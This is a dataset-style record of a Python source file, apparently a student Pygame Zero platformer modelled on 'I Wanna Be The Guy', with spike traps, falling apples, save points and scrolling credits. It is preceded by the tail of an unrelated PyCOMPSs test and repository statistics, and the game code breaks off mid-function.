raise PyCOMPSsException("Key: %s is not in the result dictionary" % k)
assert (
v == result[k]
), "The value of key: %s does not match the expected value: %s" % (k, str(v))
assert (
result == jvm_expected_result
), "The jvm opts file has not been parsed as expected"
os.remove(jvm_opt_file)
shutil.rmtree(temp_folder)
| 53.562874
| 487
| 0.723644
| 1,124
| 8,945
| 5.705516
| 0.219751
| 0.053329
| 0.054889
| 0.041166
| 0.78871
| 0.786216
| 0.779043
| 0.779043
| 0.779043
| 0.779043
| 0
| 0.02439
| 0.119955
| 8,945
| 166
| 488
| 53.885542
| 0.790269
| 0.083846
| 0
| 0.022989
| 0
| 0.045977
| 0.635767
| 0.478615
| 0
| 0
| 0
| 0
| 0.034483
| 1
| 0.011494
| false
| 0
| 0.057471
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
878d0729351b449a7d382cd0b6a96676aa9239c0
| 41,871
|
py
|
Python
|
iwanna.py
|
ZYM-PKU/PythonSummerSchool
|
b0a32dc2d9214fa9a794442bb3408c6f9f7f2b48
|
[
"MIT"
] | null | null | null |
iwanna.py
|
ZYM-PKU/PythonSummerSchool
|
b0a32dc2d9214fa9a794442bb3408c6f9f7f2b48
|
[
"MIT"
] | null | null | null |
iwanna.py
|
ZYM-PKU/PythonSummerSchool
|
b0a32dc2d9214fa9a794442bb3408c6f9f7f2b48
|
[
"MIT"
] | null | null | null |
# coding=utf-8
import sys
import time
import math
import pgzrun
import random
#全局设置
WIDTH = 1280
HEIGHT = 720
BOTTOM=710
#地图地面
bottoms=[]
#升降平台
platforms=[]
#背景
backs=[]
#存档点
saves=[]
#按钮
buttons=[]
#树木
trees=[]
#苹果
apples=[]
#尖刺
spines=[]
#人物
player=Actor('player_right')
RESET_POS=(0,BOTTOM)#设置重生点
death_count=0#死亡次数
music_played=False#保证死亡音乐只播放一次
test_mode=False#开发者模式(无敌)
current_window=0#当前窗口(0表示初始化界面)
current_y=-200#结尾字幕位置
death_end=False#必死结局
tic=0.0
def init():
global RESET_POS,music_played
bottoms.clear()
bottom=Actor('start_bottom')
bottom.bottomleft=(0,720)
bottoms.append(bottom)
RESET_POS=(0,720-bottom.height)
spines.clear()
for i in range(8):
spine=Actor('spine_up')
spine.bottomleft=(50+i*150,720-bottom.height)
spine.points=[]
spine.name="bottom"
spines.append(spine)
edge_sample()
apples.clear()
center,radius=(220,260),120
apple=Actor('apple')
apple.pos=center
apple.name="center"
apples.append(apple)
for sita in range(5):
apple=Actor('apple')
apple.pos=(center[0]+radius*math.cos(sita*30),center[1]-radius*math.sin(sita*30))
apple.anchor=(center[0]-apple.pos[0],center[1]-apple.pos[1])
apple.name="rotate"
apples.append(apple)
center,radius=(1050,260),120
apple=Actor('apple')
apple.pos=center
apple.name="center"
apples.append(apple)
for sita in range(5):
apple=Actor('apple')
apple.pos=(center[0]+radius*math.cos(sita*30),center[1]-radius*math.sin(sita*30))
apple.anchor=(center[0]-apple.pos[0],center[1]-apple.pos[1])
apple.name="rotate"
apples.append(apple)
#初始化玩家
player.image='player_right'
player.bottomleft=(0,720-bottom.height)
#速度
player.vx=0
player.vy=0
player.staticvx=0#惯性横向速度
player.ay=2#垂直加速度
#跳跃
player.jumptime=0#连续跳跃次数
player.onbottom=True#是否在地上
player.anchor=player.midbottom
#死亡
player.death=False
save=Actor('save')
save.bottomright=(1280,720-bottom.height)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='end'
saves.append(save)
music_played=False
#music.stop()
music.play('bgm')
def ending():
global RESET_POS,music_played,test_mode,tic
test_mode=True#结局默认开启无敌
tic=time.time()
music.play('death')
bottoms.clear()
bottom=Actor('start_bottom')
bottom.bottomleft=(0,800)
bottoms.append(bottom)
RESET_POS=(600,60)
spines.clear()
for i in range(8):
spine=Actor('spine_up')
spine.bottomleft=(80+i*150,800-bottom.height)
spine.points=[]
spine.name="bottom"
spines.append(spine)
edge_sample()
apples.clear()
platforms.clear()
backs.clear()
saves.clear()
buttons.clear()
trees.clear()
#初始化玩家
player.image='player_right'
player.bottomleft=RESET_POS
#速度
player.vx=0
player.vy=0
player.staticvx=0#惯性横向速度
player.ay=0.2#垂直加速度
#跳跃
player.jumptime=0#连续跳跃次数
player.onbottom=True#是否在地上
player.anchor=player.midbottom
#死亡
player.death=False
def reset():
if current_window==1:smyreset()
elif current_window==2:zymreset()
elif current_window==3:zmxreset()
elif current_window==4:wgcreset()
elif current_window==5:ending()
def edge_sample():
'''边缘采样函数,用于勾勒尖刺边缘以进行碰撞检测'''
level=4#采样等级,数值越小越容易发生碰撞,游戏难度越高
for spine in spines:
if spine.image=='spine_up':
x,y=spine.bottomleft
x+=level
for i in range(100):
x+=(spine.width-level*2)/200
y-=(spine.height-level)/100
spine.points.append((x,y))
for i in range(100):
x+=(spine.width-level*2)/200
y+=(spine.height-level)/100
spine.points.append((x,y))
elif spine.image=='spine_down':
x,y=spine.topleft
x+=level
for i in range(100):
x+=(spine.width-level*2)/200
y+=(spine.height-level)/100
spine.points.append((x,y))
for i in range(100):
x+=(spine.width-level*2)/200
y-=(spine.height-level)/100
spine.points.append((x,y))
elif spine.image in ('spine_left','spine_left_long') :
x,y=spine.topright
y+=level
for i in range(100):
x-=(spine.width-level)/100
y+=(spine.height-level*2)/200
spine.points.append((x,y))
for i in range(100):
x+=(spine.width-level)/100
y+=(spine.height-level*2)/200
spine.points.append((x,y))
elif spine.image =='spine_right' :
x,y=spine.topleft
y+=level
for i in range(100):
x+=(spine.width-level)/100
y+=(spine.height-level*2)/200
spine.points.append((x,y))
for i in range(100):
x-=(spine.width-level)/100
y+=(spine.height-level*2)/200
spine.points.append((x,y))
def recover_platform():#平台上升
for platform in platforms:
if platform.name=='platform1':
animate(platform,tween='accelerate', duration=0.3,pos=(platform.pos[0],platform.pos[1]-160))
def draw():
global current_y
screen.clear()
if current_window==4: screen.blit('cover1',(0,0))
else: screen.blit('cover',(0,0))
for back in backs:back.draw()
for tree in trees:tree.draw()
for spine in spines:spine.draw()
for platform in platforms:platform.draw()
for bottom in bottoms:bottom.draw()
for save in saves:save.draw()
for button in buttons:button.draw()
for apple in apples:apple.draw()
player.draw()
screen.draw.text(f"Deaths: {death_count}",(0, 0),gcolor="green",fontsize=30,fontname="comic")
if player.death:
if current_window<5:screen.draw.text(" GAME OVER\n--------------------------------\n PRESS 'R' TO CONTINUE",(120, 180), shadow=(2,2), scolor="#202020",fontsize=80,fontname="comic")
else: screen.draw.text(" GAME OVER\n-------------------------------\n PRESS 'Esc' To Exit",(120,180), shadow=(2,2), scolor="#202020",fontsize=80,fontname="comic")
if current_window==0 and not player.death:
screen.draw.text(" I WANNA\n BE THE GUY",(130, 100), shadow=(2,2), scolor="#202020",gcolor="red",fontsize=100,fontname="comic")
screen.draw.text("Use left/right arrow keys to move, space to jump and 's' to save",(200, 380),color="black",fontsize=30,fontname="comic")
screen.draw.text("Version: 2.1.0",(1080, 680),gcolor="cyan",fontsize=30,fontname="comic")
screen.draw.text("POWERED BY PYTHON",(200, 550), color=(255,127,80),fontsize=80,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
if current_window==5:
if current_y<=2050:current_y+=1
screen.draw.text("Thanks for playing!",(120, current_y), shadow=(2,2), scolor="#202020",gcolor="cyan",fontsize=120,fontname="comic")
screen.draw.text("Developers:",(150, current_y-500), color=(220,20,60),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
screen.draw.text("Zhao YiMing",(550, current_y-700), color=(255,215,0),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
screen.draw.text("Zhang manxi",(200, current_y-900), color=(255,182,193),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
screen.draw.text("Shen mingyu",(480, current_y-1100), color=(255,105,180),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
screen.draw.text("Wang gongchen",(300, current_y-1300), color=(0,191,255),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
screen.draw.text(f"Total Deaths: {death_count}",(250, current_y-2000), color=(0,255,127),fontsize=100,owidth=1.5, ocolor="black", alpha=0.8,fontname="comic")
def update():
global music_played
#运动模块
player.vy+=player.ay
player.vx=player.staticvx
if not player.death:
#物体边界检测
for bottom in bottoms:
if bottom.top<=player.bottom+player.vy<=bottom.bottom and player.left<bottom.right and player.right>bottom.left :
player.vy=0
player.bottom=bottom.top
player.onbottom=True
if bottom.top<=player.top+player.vy<=bottom.bottom and player.left<bottom.right and player.right>bottom.left :
player.vy=0
player.top=bottom.bottom
if bottom.left<=player.left+player.vx<=bottom.right and player.bottom>bottom.top and player.top<bottom.bottom :
player.vx=0
player.left=bottom.right
if bottom.left<=player.right+player.vx<=bottom.right and player.bottom>bottom.top and player.top<bottom.bottom :
player.vx=0
player.right=bottom.left
for platform in platforms:
if platform.top<=player.bottom+player.vy<=platform.bottom and player.left<platform.right and player.right>platform.left :
player.vy=0
player.bottom=platform.top
player.onbottom=True
if platform.top<=player.top+player.vy<=platform.bottom and player.left<platform.right and player.right>platform.left :
if not test_mode:player.death=True
else:
player.vy=0
player.bottom=platform.top
player.onbottom=True
if platform.left<=player.left+player.vx<=platform.right and player.bottom>platform.top+5 and player.top<platform.bottom :#+5偏移量为了防止平台升起时造成瞬时高度差给判断带来影响
player.vx=0
player.left=platform.right
if platform.left<=player.right+player.vx<=platform.right and player.bottom>platform.top+5 and player.top<platform.bottom :
player.vx=0
player.right=platform.left
#全局边界检测
if player.left+player.vx<0:
player.left=0
player.vx=0
if player.right+player.vx>WIDTH:
player.right=WIDTH
player.vx=0
if player.top+player.vy<0:
player.top=0
player.vy=0
if current_window==0:zymupdate()
elif current_window==1:smyupdate()
elif current_window==2:zymupdate()
elif current_window==3:zmxupdate()
elif current_window==4:wgcupdate()
#死亡处理
elif not music_played and current_window!=5:
global death_count
death_count+=1
music.play_once('fail')
player.image='player_left_dead' if player.image=='player_left' else 'player_right_dead'
music_played=True
if current_window==5:endupdate()
else:
#运动
player.left+=player.vx
if player.bottom<=1000:
player.bottom+=player.vy#<1000是为了防止死亡后一直下落
def on_key_down(key):
global RESET_POS,test_mode,current_window
#运动控制
if not player.death:
if key==key.RIGHT:
player.staticvx=8
player.image='player_right'
if key==key.LEFT:
player.staticvx=-8
player.image='player_left'
if key==key.SPACE:
if player.onbottom:player.jumptime=0
if player.jumptime<2:
if player.jumptime==0:
sounds.jump.play()
else:sounds.jump1.play()
player.vy=-20
player.jumptime+=1
player.onbottom=False
#保存存档点
if key==key.S:
for save in saves:
if player.colliderect(save) and save.image=='save' :
if save.name!='end':
tone.play('E4', 0.1)
save.image='saved'
RESET_POS=save.bottomleft
else:
tone.play('A#5', 0.1)
current_window+=1
if current_window==1:RESET_POS=(0,606)
elif current_window==2:RESET_POS=(0,710)
elif current_window==3:RESET_POS=(0,710)
elif current_window==4:RESET_POS=(0,606)
reset()
if player.death or test_mode:
if key==key.R and current_window<5:
if current_window==0:
init()
else:
reset()
if key==key.P:test_mode=not test_mode
if key==key.ESCAPE:sys.exit(0)
def on_key_up(key):
#运动控制
if not player.death:
if key==key.RIGHT:
if not player.image=='player_left':
player.staticvx=0
if key==key.LEFT:
if not player.image=='player_right':
player.staticvx=0
def smyreset():
global music_played,BOTTOM
#初始化地面
bottoms.clear()
bottom=Actor('bottom')
bottom.bottomleft=(0,750)
bottoms.append(bottom)
BOTTOM=750-bottom.height
#初始化平台
platforms.clear()
platform=Actor('platform')
platform.bottomright=(900,300)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomleft=(480,300)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.topleft=(340,350)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(200,500)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(1280,300)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
#初始化存档点
saves.clear()
save=Actor('saved')
save.bottomleft=(0,BOTTOM)
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,519)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='end'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,220)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
#初始化按钮
buttons.clear()
button=Actor('button')
button.bottomright=(1280,BOTTOM)
buttons.append(button)
#初始化树
trees.clear()
tree=Actor('tree')
tree.bottomleft=(1000,BOTTOM)
trees.append(tree)
#初始化苹果
apples.clear()
apple=Actor('apple')
apple.pos=(1050,450)
apple.name="normal"
apples.append(apple)
apple=Actor('apple')
apple.pos=(1180,390)
apple.name="normal"
apples.append(apple)
#初始化尖刺
spines.clear()
for i in range(2):
spine=Actor('spine_right')
spine.bottomleft=(100,380-i*80)
spine.points=[]
spine.name="middle"
spines.append(spine)
#陷阱刺
for i in range(2):
spine=Actor('spine_up')
spine.bottomleft=(180+i*80,220)
spine.points=[]
spine.name="trap1"
spine.animate_acted=False
spines.append(spine)
for i in range (8):
spine=Actor('spine_up')
spine.bottomleft=(100+100*i,750-bottom.height)
spine.points=[]
spine.name="trap2"
spine.animate_acted=False
spines.append(spine)
edge_sample()
#初始化玩家
player.image='player_right'
player.bottomleft=RESET_POS
#速度
player.vx=0
player.vy=0
player.staticvx=0#惯性横向速度
player.ay=2#垂直加速度
#跳跃
player.jumptime=0#连续跳跃次数
player.onbottom=True#是否在地上
#死亡
player.death=False
music_played=False
animate_acted=False
#music.stop()
music.play('bgm')
def zymreset():
global music_played,BOTTOM
#初始化地面
bottoms.clear()
bottom=Actor('bottom1')
bottom.bottomleft=(0,800)
bottoms.append(bottom)
BOTTOM=800-bottom.height
bottom=Actor('bottom_half')
bottom.bottomright=(1174,580)
bottoms.append(bottom)
bottom=Actor('bottom_top_right')
bottom.bottomright=(1280,250)
bottoms.append(bottom)
bottom=Actor('bottom_top_left')
bottom.bottomright=(403,250)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(1174,519)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(1174-500,519)
bottoms.append(bottom)
bottom=Actor('platform')
bottom.topleft=(237,392)
bottoms.append(bottom)
bottom=Actor('vertical1')
bottom.bottomleft=(0,452)
bottoms.append(bottom)
bottom=Actor('vertical2')
bottom.bottomleft=(900,162)
bottoms.append(bottom)
#初始化平台
platforms.clear()
platform=Actor('platform')
platform.bottomleft=(1174,580)
platform.name='platform1'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('bottom_middle')
platform.topleft=(104,392)
platform.name='platform2'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('bottom_top_middle')
platform.bottomright=(503,250)
platform.name='platform3'
platform.animate_acted=False
platforms.append(platform)
#初始化背景
backs.clear()
back=Actor('back1')
back.topright=(1280,580)
backs.append(back)
back=Actor('back2')
back.topright=(1280,250)
backs.append(back)
#初始化存档点
saves.clear()
save=Actor('saved')
save.bottomleft=(0,BOTTOM)
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,519)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,162)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='end'
saves.append(save)
save=Actor('save')
save.bottomleft=(280,392)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
#初始化按钮
buttons.clear()
button=Actor('button')
button.bottomright=(1280,BOTTOM)
buttons.append(button)
#初始化树木
trees.clear()
tree=Actor('tree')
tree.bottomleft=(100,BOTTOM)
trees.append(tree)
#初始化苹果
apples.clear()
apple=Actor('apple')
apple.pos=(220,560)
apple.name="normal"
apples.append(apple)
apple=Actor('apple')
apple.pos=(270,522)
apple.name="normal"
apples.append(apple)
center,radius=(880,360),120
apple=Actor('apple')
apple.pos=center
apple.name="center"
apples.append(apple)
for sita in range(5):
apple=Actor('apple')
apple.pos=(center[0]+radius*math.cos(sita*30),center[1]-radius*math.sin(sita*30))
apple.anchor=(center[0]-apple.pos[0],center[1]-apple.pos[1])
apple.name="rotate"
apples.append(apple)
#初始化尖刺
spines.clear()
for i in range(4):
spine=Actor('spine_up')
spine.bottomleft=(500+i*170,BOTTOM)
spine.points=[]
spine.name="bottom"
spines.append(spine)
for i in range(4):
spine=Actor('spine_down')
spine.topleft=(585+i*170,580)
spine.points=[]
spine.name="bottom"
spines.append(spine)
for i in range(2):
spine=Actor('spine_right')
spine.bottomleft=(104,320-i*140)
spine.points=[]
spine.name="middle"
spines.append(spine)
spine=Actor('spine_right')
spine.bottomleft=(104,100+i*292)
spine.points=[]
spine.name="middle"
spines.append(spine)
for i in range(2):
spine=Actor('spine_up')
spine.bottomleft=(980+i*130,162)
spine.points=[]
spine.name="top"
spines.append(spine)
for i in range(3):
spine=Actor('spine_up')
spine.bottomleft=(503+i*130,162)
spine.points=[]
spine.name="top"
spines.append(spine)
spine=Actor('spine_left')
spine.bottomright=(252,250)
spine.points=[]
spine.name="middle"
spines.append(spine)
#陷阱刺
spine=Actor('spine_up')
spine.bottomright=(1170,500)
spine.points=[]
spine.name="trap1"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_left')
spine.topright=(503,519)
spine.points=[]
spine.name="trap2"
spine.animate_acted=False
spines.append(spine)
for i in range(2):
spine=Actor('spine_up')
spine.bottomleft=(252+i*25,162)
spine.points=[]
spine.name="trap3"
spine.animate_acted=False
spines.append(spine)
edge_sample()#尖刺边界采样
#初始化玩家
player.image='player_right'
player.bottomleft=RESET_POS
#速度
player.vx=0
player.vy=0
player.staticvx=0#惯性横向速度
player.ay=2#垂直加速度
#跳跃
player.jumptime=0#连续跳跃次数
player.onbottom=True#是否在地上
player.anchor=player.midbottom
#死亡
player.death=False
music_played=False
animate_acted=False
#music.stop()
music.play('bgm')
def zmxreset():
global music_played,BOTTOM
#初始化地面
bottoms.clear()
bottom=Actor('bottom1')
bottom.bottomleft=(0,800)
bottoms.append(bottom)
BOTTOM=800-bottom.height
bottom=Actor('bottom_top_left')
bottom.bottomright=(240,649)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(375,610)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(1150,370)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(723,225)
bottoms.append(bottom)
bottom=Actor('platform')
bottom.topleft=(240,170)
bottoms.append(bottom)
bottom=Actor('platform')
bottom.topleft=(450,88)
bottoms.append(bottom)
bottom=Actor('vertical1')
bottom.bottomleft=(450,730)
bottoms.append(bottom)
bottom=Actor('vertical2')
bottom.bottomleft=(552,170)
bottoms.append(bottom)
bottom=Actor('vertical1')
bottom.bottomleft=(510,730)
bottoms.append(bottom)
bottom=Actor('vertical1')
bottom.bottomleft=(723,580)
bottoms.append(bottom)
bottom=Actor('vertical1')
bottom.bottomleft=(900,500)
bottoms.append(bottom)
#初始化平台
platforms.clear()
platform=Actor('platform')
platform.bottomleft=(1174,580)
platform.name='platform1'
platform.animate_acted=False
platforms.append(platform)
#初始化存档点
saves.clear()
save=Actor('save')
save.bottomleft=(0,BOTTOM)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomleft=(350,265)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,519)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='end'
saves.append(save)
save=Actor('save')
save.bottomright=(770,170)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomleft=(480,90)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
#初始化按钮
buttons.clear()
button=Actor('button')
button.bottomright=(1280,BOTTOM)
buttons.append(button)
#初始化树木
trees.clear()
tree=Actor('tree')
tree.bottomleft=(100,BOTTOM)
trees.append(tree)
tree=Actor('tree')
tree.bottomleft=(970,BOTTOM)
trees.append(tree)
#初始化苹果
apples.clear()
apple=Actor('apple')
apple.pos=(220,545)
apple.name="normal"
apples.append(apple)
apple=Actor('apple')
apple.pos=(270,522)
apple.name="normal"
apples.append(apple)
apple=Actor('apple')
apple.pos=(1130,470)
apple.name="normal"
apples.append(apple)
apple=Actor('apple')
apple.pos=(1150,522)
apple.name="normal"
apples.append(apple)
#初始化尖刺
spines.clear()
for i in range(4):
spine=Actor('spine_up')
spine.bottomleft=(622+i*120,BOTTOM)
spine.points=[]
spine.name="bottom"
spines.append(spine)
spine=Actor('spine_right')
spine.bottomleft=(608,420)
spine.points=[]
spine.name="middle"
spines.append(spine)
spine=Actor('spine_up')
spine.bottomleft=(835,170)
spine.points=[]
spine.name="top"
spines.append(spine)
#陷阱刺
spine=Actor('spine_up')
spine.bottomright=(1179,440)
spine.points=[]
spine.name="trap1"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_left')
spine.topright=(450,519)
spine.points=[]
spine.name="trap2"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_up')
spine.bottomleft=(175,190)
spine.points=[]
spine.name="trap3"
spine.animate_acted=False
spines.append(spine)
edge_sample()#尖刺边界采样
#初始化玩家
player.image='player_right'
player.bottomleft=RESET_POS
#速度
player.vx=0
player.vy=0
player.staticvx=0#惯性横向速度
player.ay=2#垂直加速度
#跳跃
player.jumptime=0#连续跳跃次数
player.onbottom=True#是否在地上
player.anchor=player.midbottom
#死亡
player.death=False
music_played=False
animate_acted=False
#music.stop()
music.play('bgm')
def wgcreset():
global music_played,BOTTOM
apples.clear()
buttons.clear()
#初始化地面
bottoms.clear()
bottom=Actor('bottom')
bottom.bottomleft=(0,750)
bottoms.append(bottom)
BOTTOM=750-bottom.height
#初始化平台
platforms.clear()
platform=Actor('platform')
platform.bottomright=(680,500)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(550,300)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(350,300)
platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(150,300)
platform.name='platform1'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(150,300)
platform.name='platform2'
platform.animate_acted=False
platforms.append(platform)
bottom=Actor('vertical')
bottom.bottomright=(765,610)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(830,350)
bottoms.append(bottom)
bottom=Actor('vertical2')
bottom.bottomright=(800,450)
bottoms.append(bottom)
bottom=Actor('vertical2')
bottom.bottomright=(830,190)
bottoms.append(bottom)
for i in range(4):
bottom=Actor('platform')
bottom.bottomright=(345+i*100,135)
bottoms.append(bottom)
for i in range(4):
bottom=Actor('platform')
bottom.bottomright=(820+i*100,135)
bottoms.append(bottom)
bottom=Actor('platform')
bottom.bottomright=(1300,335)
bottoms.append(bottom)
bottom=Actor('platform')
bottom.bottomright=(1200,335)
bottoms.append(bottom)
#初始化存档点
saves.clear()
save=Actor('saved')
save.bottomleft=(0,BOTTOM)
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(640,449)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(800,90)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,BOTTOM)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='end'
saves.append(save)
#初始化尖刺
spines.clear()
#陷阱刺
spine=Actor('spine_up')
spine.bottomleft=(250,610)
spine.points=[]
spine.name="trap1"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_up')
spine.bottomleft=(100,640)
spine.points=[]
spine.name="trap2"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_up')
spine.bottomleft=(550,610)
spine.points=[]
spine.name="trap3"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_light')
spine.pos=(170,250)
spine.points=[]
spine.name="spine_light"
spine.name="trap4"
spine.animate_acted=False
spines.append(spine)
spine=Actor('final')
spine.bottomleft=(1580,250)
spine.points=[]
spine.name="trap5"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_right')
spine.bottomleft=(750,610)
spine.points=[]
spine.name="trap6"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_up')
spine.bottomleft=(1100,610)
spine.points=[]
spine.name="trap7"
spine.animate_acted=False
spines.append(spine)
edge_sample()
#初始化玩家
player.image='player_right'
player.bottomleft=RESET_POS
#速度
player.vx=0
player.vy=0
player.staticvx=0#惯性横向速度
player.ay=2#垂直加速度
#跳跃
player.jumptime=0#连续跳跃次数
player.onbottom=True#是否在地上
#死亡
player.death=False
music_played=False
animate_acted=False
#music.stop()
music.play('bgm')
def smyupdate():
global music_played
#陷阱
for apple in apples:
if apple.name=='normal' and abs(apple.left-player.left)<45 and player.top+20>apple.top:
animate(apple,tween='bounce_end', duration=0.1,pos=(apple.pos[0],BOTTOM-apple.height/2))
if apple.name in ('rotate','center'):
apple.angle+=1
for spine in spines:
if spine.name=='trap1'and player.left-spine.right>80 and player.bottom<=spine.bottom :
if not spine.animate_acted:
sounds.up.play()
spine.angle-=90
animate(spine,tween='linear', duration=5,pos=(spine.pos[0]+900,spine.pos[1]))
spine.animate_acted=True
if spine.name=='trap2'and spine.right-player.left>3 and player.bottom<=spine.top :
if not spine.animate_acted:
sounds.up.play()
spine.image='spine_left_long'
spine.animate_acted=True
if not test_mode:
#碰撞检测
for spine in spines:
if spine.name in ("trap1","trap2") and player.colliderect(spine):
player.death=True
for point in spine.points:
if player.collidepoint(point):
player.death=True
for apple in apples:
if player.colliderect(apple):
player.death=True
for button in buttons:
if player.colliderect(button):
button.image='button_pressed'
button.bottomright=(1280,BOTTOM)
for platform in platforms:
if platform.name=='platform1':
if buttons[0].image=='button_pressed' and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.3,pos=(platform.pos[0],platform.pos[1]+160))
platform.animate_acted=True
clock.schedule_unique(recover_platform,1)
elif platform.name=='platform2':
if player.right<platform.right and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='linear', duration=4,pos=(platform.pos[0],platform.pos[1]-600))
platform.animate_acted=True
elif platform.name=='platform3':
if player.left>platform.left and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.5,pos=(platform.pos[0],platform.pos[1]+1000))
platform.animate_acted=True
def zymupdate():
global music_played
#陷阱
for apple in apples:
if apple.name=='normal' and abs(apple.left-player.left)<45 and player.top+20>apple.top:
animate(apple,tween='bounce_end', duration=0.1,pos=(apple.pos[0],BOTTOM-apple.height/2))
if apple.name in ('rotate','center'):
apple.angle+=1
for spine in spines:
if spine.name=='trap1'and abs(spine.right-player.left)<10 and player.bottom<350 :
if not spine.animate_acted:
animate(spine,tween='accelerate', duration=0.5,pos=(spine.pos[0],spine.pos[1]-1000))
sounds.up.play()
spine.animate_acted=True
if spine.name=='trap2'and spine.right-player.left>3 and player.bottom<=spine.top :
if not spine.animate_acted:
spine.image='spine_left_long'
sounds.up.play()
spine.animate_acted=True
if spine.name=='trap3'and player.left-spine.right>80 and player.bottom<=spine.bottom :
if not spine.animate_acted:
spine.angle-=90
animate(spine,tween='linear', duration=5,pos=(spine.pos[0]+900,spine.pos[1]))
spine.animate_acted=True
if not test_mode:
#碰撞检测
for spine in spines:
if spine.name in ("trap1","trap2","trap3") and player.colliderect(spine):
player.death=True
for point in spine.points:
if player.collidepoint(point):
player.death=True
for apple in apples:
if player.colliderect(apple):
player.death=True
for button in buttons:
if player.colliderect(button):
button.image='button_pressed'
button.bottomright=(1280,BOTTOM)
for platform in platforms:
if platform.name=='platform1':
if buttons[0].image=='button_pressed' and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.3,pos=(platform.pos[0],platform.pos[1]+160))
platform.animate_acted=True
sounds.up.play()
clock.schedule_unique(recover_platform,1)
elif platform.name=='platform2':
if player.right<platform.right and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='linear', duration=4,pos=(platform.pos[0],platform.pos[1]-600))
platform.animate_acted=True
elif platform.name=='platform3':
if player.left>platform.left and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.5,pos=(platform.pos[0],platform.pos[1]+1000))
sounds.up.play()
platform.animate_acted=True
def zmxupdate():
global music_played
#陷阱
for apple in apples:
if apple.name=='normal' and abs(apple.left-player.left)<45 and player.top+20>apple.top:
animate(apple,tween='bounce_end', duration=0.1,pos=(apple.pos[0],BOTTOM-apple.height/2))
if apple.name in ('rotate','center'):
apple.angle+=1
for spine in spines:
if spine.name=='trap1'and abs(spine.right-player.left)<10 and player.bottom<350 :
if not spine.animate_acted:
animate(spine,tween='accelerate', duration=0.5,pos=(spine.pos[0],spine.pos[1]-1000))
sounds.up.play()
spine.animate_acted=True
if spine.name=='trap2'and spine.right-player.left>3 and player.bottom<=spine.top :
if not spine.animate_acted:
spine.image='spine_left_long'
sounds.up.play()
spine.animate_acted=True
if spine.name=='trap3'and player.left-spine.right>80 and player.bottom<=spine.bottom :
if not spine.animate_acted:
spine.angle-=90
animate(spine,tween='linear', duration=5,pos=(spine.pos[0]+1020,spine.pos[1]))
spine.animate_acted=True
if not test_mode:
#碰撞检测
for spine in spines:
